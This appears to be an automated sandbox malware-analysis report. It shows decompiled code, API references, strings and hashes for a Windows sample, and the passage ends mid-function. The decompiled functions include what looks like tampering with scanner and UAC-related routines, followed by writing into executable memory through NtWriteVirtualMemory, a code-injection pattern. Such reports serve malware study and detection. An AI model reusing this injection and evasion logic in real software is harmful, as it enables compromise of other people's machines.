VarR4FromStr, xrefs: 0326D3C3
VarNot, xrefs: 0326D2BB
VarCyFromStr, xrefs: 0326D405
VarOr, xrefs: 0326D36B
VarR8FromStr, xrefs: 0326D3D9
VarXor, xrefs: 0326D381
VarBstrFromDate, xrefs: 0326D447
VarMod, xrefs: 0326D33F
VarDiv, xrefs: 0326D313
VarMul, xrefs: 0326D2FD
VarCmp, xrefs: 0326D397
oleaut32.dll, xrefs: 0326D27C
VarBstrFromCy, xrefs: 0326D431
VarDateFromStr, xrefs: 0326D3EF

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 933350997f14de32a07397ff759d202494cbd7180df2083f1f324c8c4329f829
Instruction ID: 92330bf2676d8ef304d9c1ecb9b544badf942508303af584a560e8cd17b018ed
Opcode Fuzzy Hash: 933350997f14de32a07397ff759d202494cbd7180df2083f1f324c8c4329f829
Instruction Fuzzy Hash: DB4105B5B3434C5B5208FB6DB40042BB7A9DE88A10361802BB8488F759DF60FCC59BA9

Uniqueness

Uniqueness Score: -1.00%

Function 03262530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E03262530(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x329b708) {
					_t79 = E03262048(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E0326238C(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E032623E4(_t131, __eflags, _t197);
							}
						}
						_t79 = E03262024(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x329d7b0; // 0x7fde0000
				while(_t132 != 0x329d7ac && _v112652 < 0x1000) {
					_t79 = E0326238C(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0xd0004
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f2d0000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E032621E0(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x3289042;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E032621E0(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E032620C4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E032621E0(8, E032620C4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E032621E0(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E032621E0(6, _t140);
								} else {
									E0326363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E032621E0(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E032620C4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E032621E0(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E032621E0(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E032620C4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E03263098( &_v112644, 0x1b800);
					E03263098( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x329b70c; // 0x91c0000
					goto L12;
				}
			}

0x03262533
0x03262534
0x03262534
0x00000000
0x0326260f
0x0326258f
0x03262594
0x03262596
0x03262598
0x0326260c
0x0326260c
0x00000000
0x00000000
0x00000000
0x00000000
0x0326259a
0x0326259a
0x0326259f
0x032625a1
0x032625a7
0x032625a9
0x032625af
0x032625bc
0x032625c6
0x032625ce
0x032625d6
0x032625db
0x032625dd
0x032625df
0x032625f2
0x032625f9
0x032625f9
0x032625f9
0x032625f9
0x032625dd
0x032625b1
0x032625b4
0x032625b9
0x032625af
0x03262601
0x03262606
0x03262608
0x03262608
0x00000000
0x0326259a
0x0326261b
0x0326265a
0x03262628
0x0326262d
0x0326262f
0x03262631
0x03262638
0x03262644
0x0326264a
0x03262651
0x03262651
0x03262651
0x03262651
0x03262657
0x03262657
0x03262657
0x03262675
0x032628d3
0x032628d9
0x032628d9
0x0326267b
0x03262684
0x0326269f
0x032626a1
0x032626ab
0x032626bb
0x032626c1
0x032626cd
0x032626d3
0x032626da
0x032626e5
0x032626e7
0x032626f8
0x03262705
0x03262718
0x0326271a
0x0326271a
0x03262728
0x03262779
0x0326277c
0x0326277d
0x03262780
0x03262780
0x0326272a
0x0326272a
0x0326272e
0x03262740
0x03262742
0x03262745
0x03262746
0x0326274a
0x0326276e
0x03262770
0x03262770
0x03262783
0x03262786
0x0326279d
0x03262788
0x03262788
0x032627b2
0x0326278a
0x032627bf
0x032627d8
0x032627d8
0x03262788
0x032627da
0x032627dd
0x032627de
0x032627e2
0x032627ef
0x032627ef
0x032627f1
0x032627f2
0x032627f8
0x00000000
0x00000000
0x00000000
0x00000000
0x032627f8
0x032627fe
0x03262804
0x0326280a
0x03262814
0x0326281b
0x0326281b
0x0326281b
0x0326282e
0x032628aa
0x032628b6
0x032628ce
0x00000000
0x032628ce
0x03262837
0x03262839
0x0326283c
0x0326283d
0x03262840
0x03262841
0x03262844
0x03262845
0x03262848
0x03262848
0x0326285a
0x03262862
0x03262865
0x03262867
0x03262868
0x03262872
0x00000000
0x03262878
0x0326287f
0x03262881
0x03262884
0x03262885
0x03262888
0x03262888
0x03262892
0x0326289c
0x00000000
0x00000000
0x0326289e
0x032628a4
0x032628a7
0x032628a8
0x00000000
0x00000000
0x032628a8
0x03262539
0x03262539
0x0326253f
0x03262540
0x03262541
0x00000000
0x03262543
0x0326255c
0x0326256e
0x03262573
0x03262575
0x0326257b
0x03262582
0x00000000
0x03262582

APIs

MessageBoxA.USER32 ref: 032628CE

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 03262849
The unexpected small block leaks are:, xrefs: 03262707
bytes: , xrefs: 0326275D
Unexpected Memory Leak, xrefs: 032628C0
, xrefs: 03262814
Unknown, xrefs: 0326278C
7, xrefs: 032626A1
An unexpected memory leak has occurred. , xrefs: 03262690
String, xrefs: 032627A1

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 235227bc6b49e0abcfb34ac9bb965942933e993b755b545ef6af50fb1a5469be
Instruction ID: a27ff273a4fdec27cbe6f6f729a7ba2a41993e5fdba57b2cfff96200c4ba392c
Opcode Fuzzy Hash: 235227bc6b49e0abcfb34ac9bb965942933e993b755b545ef6af50fb1a5469be
Instruction Fuzzy Hash: 3CA1D534A24358CBDB21EA2CCC84BD8B6E8EF09750F1449E5D549AB382CBB589C5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0327A58C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0327A58C(intOrPtr _a4, void* _a8) {
				void* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				int _t23;
				void* _t49;
				void* _t51;
				void* _t52;

				_t51 = _a8;
				while(1) {
					_t23 = IsBadReadPtr(_t51, 0x14);
					if(_t23 != 0 ||  *((intOrPtr*)(_t51 + 0x10)) == 0 ||  *((intOrPtr*)(_t51 + 0xc)) == 0) {
						break;
					}
					_v8 =  *((intOrPtr*)(_t51 + 0xc)) + _a4;
					if(IsBadReadPtr(_v8, 4) != 0) {
						L13:
						_t51 = _t51 + 0x14;
						continue;
					}
					 *0x329e514 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\KernelBase.dll"), "LoadLibraryExA");
					_v12 =  *0x329e514(_v8, 0, 0);
					_t49 =  *((intOrPtr*)(_t51 + 0x10)) + _a4;
					_t52 = _t49;
					if( *((intOrPtr*)(_t51 + 4)) == 0xffffffff) {
						_t49 =  *_t51 + _a4;
					}
					while(IsBadReadPtr(_t49, 4) == 0 && IsBadReadPtr(_t52, 2) == 0 &&  *_t49 != 0) {
						if(E03277A50(0, _t52, 4, 0x40, _v16) != 0) {
							if(( *(_t49 + 3) & 0x00000080) == 0) {
								 *_t52 = GetProcAddress(_v12, _a4 +  *_t49 + 2);
							} else {
								 *_t52 = GetProcAddress(_v12,  *_t49 & 0x0000ffff);
							}
							E03277A50(0, _t52, 4, _v16, _v16);
						}
						_t49 = _t49 + 4;
						_t52 = _t52 + 4;
					}
					goto L13;
				}
				return _t23;
			}

0x0327a595
0x0327a674
0x0327a677
0x0327a67e
0x00000000
0x00000000
0x0327a5a3
0x0327a5b3
0x0327a671
0x0327a671
0x00000000
0x0327a671
0x0327a5ce
0x0327a5e1
0x0327a5e7
0x0327a5ea
0x0327a5f0
0x0327a5f4
0x0327a5f4
0x0327a654
0x0327a60b
0x0327a611
0x0327a63a
0x0327a613
0x0327a624
0x0327a624
0x0327a649
0x0327a649
0x0327a64e
0x0327a651
0x0327a651
0x00000000
0x0327a654
0x0327a696

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0327A5AC
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0327A5C3
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0327A5C9
IsBadReadPtr.KERNEL32(?,00000004), ref: 0327A657
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0327A663
IsBadReadPtr.KERNEL32(?,00000014), ref: 0327A677

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 0327A5BE
LoadLibraryExA, xrefs: 0327A5B9

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 8c5920a08f19f03da4ad3bbfedbbe6b61085a4efff04f36adde5bebcfb4e800e
Instruction ID: d5869f3e266cdb30ec53edcfa8975dbd59e5635eedbc0cef17c36d4a70ccea10
Opcode Fuzzy Hash: 8c5920a08f19f03da4ad3bbfedbbe6b61085a4efff04f36adde5bebcfb4e800e
Instruction Fuzzy Hash: 15315CB5A20306BBDF20DF68DC85F5EB7A8BF05764F144254EA14EA380D3B4A9C08B65

Uniqueness

Uniqueness Score: -1.00%

Function 0327C24C Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 420
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0327C24C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				void* __ecx;
				_Unknown_base(*)()* _t168;
				signed int _t244;
				signed int _t276;
				_Unknown_base(*)()** _t279;
				intOrPtr _t345;
				void* _t368;
				void* _t373;
				void* _t378;
				_Unknown_base(*)()** _t379;
				void* _t384;
				void* _t389;
				void* _t394;
				void* _t399;
				void* _t404;
				void* _t409;
				void* _t414;
				void* _t419;
				void* _t424;
				intOrPtr _t425;
				void* _t431;
				void* _t436;
				void* _t438;
				void* _t440;
				intOrPtr _t442;
				intOrPtr _t443;

				_t442 = _t443;
				_t345 = 0x1d;
				do {
					_push(0);
					_push(0);
					_t345 = _t345 - 1;
					_t444 = _t345;
				} while (_t345 != 0);
				_t1 =  &_v8;
				 *_t1 = _t345;
				_v12 =  *_t1;
				_v8 = __edx;
				_t438 = __eax;
				_push(_t442);
				_push(0x327c895);
				_push( *[fs:eax]);
				 *[fs:eax] = _t443;
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v20, E03264964(_v24));
				_push(_v20);
				E032647B0( &_v32,  *0x329e544, 0x327c8b0);
				E03264698( &_v28, E03264964(_v32));
				_pop(_t368);
				E03277C04(_v28,  *0x329e544, _t368, _t444);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v36, E03264964(_v40));
				_push(_v36);
				E032647B0( &_v48,  *0x329e544, 0x327c8b0);
				E03264698( &_v44, E03264964(_v48));
				_pop(_t373);
				E03277C04(_v44,  *0x329e544, _t373, _t444);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v52, E03264964(_v56));
				_push(_v52);
				E032647B0( &_v64,  *0x329e544, 0x327c8b0);
				E03264698( &_v60, E03264964(_v64));
				_pop(_t378);
				E03277C04(_v60,  *0x329e544, _t378, _t444);
				_t168 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
				_t379 =  *0x329a888; // 0x329e320
				 *_t379 = _t168;
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v68, E03264964(_v72));
				_push(_v68);
				E032647B0( &_v80,  *0x329e544, 0x327c8b0);
				E03264698( &_v76, E03264964(_v80));
				_pop(_t384);
				E03277C04(_v76,  *0x329e544, _t384, _t444);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v84, E03264964(_v88));
				_push(_v84);
				E032647B0( &_v96,  *0x329e544, 0x327c8b0);
				E03264698( &_v92, E03264964(_v96));
				_pop(_t389);
				E03277C04(_v92,  *0x329e544, _t389, _t444);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v100, E03264964(_v104));
				_push(_v100);
				E032647B0( &_v112,  *0x329e544, 0x327c8b0);
				E03264698( &_v108, E03264964(_v112));
				_pop(_t394);
				E03277C04(_v108,  *0x329e544, _t394, _t444);
				_t445 = _v8;
				if(_v8 != 0) {
					_push(0x327c8b0);
					_push( *0x329e544);
					_push("ScanString");
					E03264824();
					E03264698( &_v116, E03264964(_v120));
					_push(_v116);
					E032647B0( &_v128,  *0x329e544, 0x327c8b0);
					E03264698( &_v124, E03264964(_v128));
					_pop(_t436);
					E03277C04(_v124,  *0x329e544, _t436, _t445);
				}
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("UacInitialize");
				E03264824();
				E03264698( &_v132, E03264964(_v136));
				_push(_v132);
				E032647B0( &_v144,  *0x329e544, 0x327c8b0);
				E03264698( &_v140, E03264964(_v144));
				_pop(_t399);
				E03277C04(_v140,  *0x329e544, _t399, _t445);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v148, E03264964(_v152));
				_push(_v148);
				E032647B0( &_v160,  *0x329e544, 0x327c8b0);
				E03264698( &_v156, E03264964(_v160));
				_pop(_t404);
				E03277C04(_v156,  *0x329e544, _t404, _t445);
				E03262EE0();
				 *0x329e548 = (E03262F08(9) + 1) * 0x5f5e100;
				_t244 =  *0x329e548; // 0x0
				_t440 = E032779BC(_t438, 0, _t244 - _v12, 0x3000, 0x40);
				_t446 = _t440;
				if(_t440 != 0) {
					_push(0x327c8b0);
					_push( *0x329e544);
					_push("UacInitialize");
					E03264824();
					E03264698( &_v164, E03264964(_v168));
					_push(_v164);
					E032647B0( &_v176,  *0x329e544, 0x327c8b0);
					E03264698( &_v172, E03264964(_v176));
					_pop(_t431);
					E03277C04(_v172,  *0x329e544, _t431, _t446);
				}
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v180, E03264964(_v184));
				_push(_v180);
				E032647B0( &_v192,  *0x329e544, 0x327c8b0);
				E03264698( &_v188, E03264964(_v192));
				_pop(_t409);
				E03277C04(_v188,  *0x329e544, _t409, _t446);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v196, E03264964(_v200));
				_push(_v196);
				E032647B0( &_v208,  *0x329e544, 0x327c8b0);
				E03264698( &_v204, E03264964(_v208));
				_pop(_t414);
				E03277C04(_v204,  *0x329e544, _t414, _t446);
				_t276 =  *0x329e548; // 0x0
				_t279 =  *0x329a888; // 0x329e320
				 *( *_t279)(_t438, _t440, _v8, _t276 - _v12, _v16);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("OpenSession");
				E03264824();
				E03264698( &_v212, E03264964(_v216));
				_push(_v212);
				E032647B0( &_v224,  *0x329e544, 0x327c8b0);
				E03264698( &_v220, E03264964(_v224));
				_pop(_t419);
				E03277C04(_v220,  *0x329e544, _t419, _t446);
				_push(0x327c8b0);
				_push( *0x329e544);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v228, E03264964(_v232));
				_push(_v228);
				E032647B0( &_v240,  *0x329e544, 0x327c8b0);
				E03264698( &_v236, E03264964(_v240));
				_pop(_t424);
				E03277C04(_v236,  *0x329e544, _t424, _t446);
				_pop(_t425);
				 *[fs:eax] = _t425;
				_push(0x327c89c);
				return E032644C4( &_v240, 0x38);
			}

0x0327c24d
0x0327c250
0x0327c255
0x0327c255
0x0327c257
0x0327c259
0x0327c259
0x0327c259
0x0327c25c
0x0327c25c
0x0327c262
0x0327c265
0x0327c268
0x0327c271
0x0327c272
0x0327c277
0x0327c27a
0x0327c27d
0x0327c282
0x0327c284
0x0327c291
0x0327c2a3
0x0327c2ab
0x0327c2b6
0x0327c2c8
0x0327c2d0
0x0327c2d1
0x0327c2d6
0x0327c2db
0x0327c2dd
0x0327c2ea
0x0327c2fc
0x0327c304
0x0327c30f
0x0327c321
0x0327c329
0x0327c32a
0x0327c32f
0x0327c334
0x0327c336
0x0327c343
0x0327c355
0x0327c35d
0x0327c368
0x0327c37a
0x0327c382
0x0327c383
0x0327c398
0x0327c39d
0x0327c3a3
0x0327c3a5
0x0327c3aa
0x0327c3ac
0x0327c3b9
0x0327c3cb
0x0327c3d3
0x0327c3de
0x0327c3f0
0x0327c3f8
0x0327c3f9
0x0327c3fe
0x0327c403
0x0327c405
0x0327c412
0x0327c424
0x0327c42c
0x0327c437
0x0327c449
0x0327c451
0x0327c452
0x0327c457
0x0327c45c
0x0327c45e
0x0327c46b
0x0327c47d
0x0327c485
0x0327c490
0x0327c4a2
0x0327c4aa
0x0327c4ab
0x0327c4b0
0x0327c4b4
0x0327c4b6
0x0327c4bb
0x0327c4bd
0x0327c4ca
0x0327c4dc
0x0327c4e4
0x0327c4ef
0x0327c501
0x0327c509
0x0327c50a
0x0327c50a
0x0327c50f
0x0327c514
0x0327c516
0x0327c526
0x0327c53b
0x0327c543
0x0327c551
0x0327c569
0x0327c574
0x0327c575
0x0327c57a
0x0327c57f
0x0327c581
0x0327c591
0x0327c5a9
0x0327c5b4
0x0327c5c2
0x0327c5da
0x0327c5e5
0x0327c5e6
0x0327c5eb
0x0327c601
0x0327c60d
0x0327c61e
0x0327c620
0x0327c622
0x0327c624
0x0327c629
0x0327c62b
0x0327c63b
0x0327c653
0x0327c65e
0x0327c66c
0x0327c684
0x0327c68f
0x0327c690
0x0327c690
0x0327c695
0x0327c69a
0x0327c69c
0x0327c6ac
0x0327c6c4
0x0327c6cf
0x0327c6dd
0x0327c6f5
0x0327c700
0x0327c701
0x0327c706
0x0327c70b
0x0327c70d
0x0327c71d
0x0327c735
0x0327c740
0x0327c74e
0x0327c766
0x0327c771
0x0327c772
0x0327c77b
0x0327c78a
0x0327c791
0x0327c793
0x0327c798
0x0327c79a
0x0327c7aa
0x0327c7c2
0x0327c7cd
0x0327c7db
0x0327c7f3
0x0327c7fe
0x0327c7ff
0x0327c804
0x0327c809
0x0327c80b
0x0327c81b
0x0327c833
0x0327c83e
0x0327c84c
0x0327c864
0x0327c86f
0x0327c870
0x0327c879
0x0327c87c
0x0327c87f
0x0327c894

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,0329E544,0327C8B0,UacInitialize,0329E544,0327C8B0,OpenSession,0329E544,0327C8B0,00000000,0327C895), ref: 0327C392
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327C398

Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

Strings

NtWriteVirtualMemory, xrefs: 0327C388
ScanString, xrefs: 0327C4BD
OpenSession, xrefs: 0327C284, 0327C405, 0327C70D, 0327C79A
ScanBuffer, xrefs: 0327C336, 0327C45E, 0327C581, 0327C69C, 0327C80B
UacInitialize, xrefs: 0327C2DD, 0327C3AC, 0327C516, 0327C62B
C:\Windows\System32\ntdll.dll, xrefs: 0327C38D

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleLibraryModuleProc$FreeLoad
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize
API String ID: 232896157-171402031
Opcode ID: b6b9bc87ad3051b35bfa775cf8b98586c06c473a486cf2b58be9a5de7243e537
Instruction ID: 192c7638b4dc9ab14cf7dc66de54e8b1f6dc6cbc179443bccdce7d832f1c79b9
Opcode Fuzzy Hash: b6b9bc87ad3051b35bfa775cf8b98586c06c473a486cf2b58be9a5de7243e537
Instruction Fuzzy Hash: 30F10C39A202689FDB12FBA5DC90FDE73B5BF45600F1081A6A454BF214DAB0AEC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0326252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0326252E(void* __eax) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t198;
				void* _t200;
				void* _t214;

				_t198 = _t200;
				_push(__eax);
				_t73 = 0x27;
				goto L2;
				L13:
